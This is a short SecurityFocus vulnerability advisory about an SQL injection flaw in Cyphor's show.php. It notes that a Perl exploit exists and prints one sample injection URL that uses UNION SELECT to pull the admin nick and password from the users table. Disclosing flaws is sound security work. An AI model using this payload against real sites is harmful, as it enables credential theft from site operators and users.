Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Cyphor Show.PHP SQL Injection Vulnerability

A PERL script that attempts to output administrative account details, such as login and password, has been made available in the exploit section.

Sample SQL injection code has been provided:
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,
password,null,null,null%20from%20users%20where%20id=1







 

Privacy Statement
Copyright 2009, SecurityFocus